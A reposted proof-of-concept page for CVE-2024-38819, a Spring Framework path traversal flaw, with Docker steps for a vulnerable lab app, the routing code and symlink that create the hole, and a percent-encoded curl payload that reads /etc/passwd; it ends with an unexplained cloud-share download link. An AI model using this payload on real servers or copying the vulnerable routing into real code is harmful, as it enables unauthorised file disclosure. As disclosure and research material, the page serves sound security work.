CVE-2024-38819 Spring 框架任意文件读取

CVE-2024-38819: Proof of Concept (PoC)

This is a proof of concept for the CVE-2024-38819 vulnerability, which I reported, demonstrating a path traversal exploit.

Execution Steps

  1. Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13)

    cd vuln
    docker build -t cve-2024-38819-poc .
  2. Run the container and expose port 8080 to the host machine

    docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
  3. Run the following command to execute the PoC and confirm the vulnerability

    curl http://localhost:8080/static/link/%2e%2e/etc/passwd

    If the attack is successful, the contents of the /etc/passwd file will be displayed.

Explanation

  1. Create PathTraversalDemoApplication.java with the following code to set up static file routing using RouterFunction and FileSystemResource:

    public RouterFunction<ServerResponse> staticResourceRouter() {
      return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
  2. Add the following command to the Dockerfile to create a symbolic link:

    RUN ln -s /static /app/static/link
  3. Create a payload that leverages percent-encoding to traverse directories through the symbolic link.

    • Path: /static/link/%2e%2e/etc/passwd

  4. Use the following curl command to execute the PoC and verify if the attack is successful:

    curl http://localhost:8080/static/link/%2e%2e/etc/passwd

    If the attack is successful, the contents of the /etc/passwd file will be displayed.

Disclaimer

This PoC is provided for educational and security research purposes. Before using this in a real system, ensure the vulnerability has been fixed and you have proper authorization. The author takes no responsibility for any misuse of this code.

link:https://pan.baidu.com/s/1Z0t9TpTPSjpXPEJ6sRIznA?pwd=weew

© 版权声明
THE END
喜欢就支持一下吧
点赞46 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容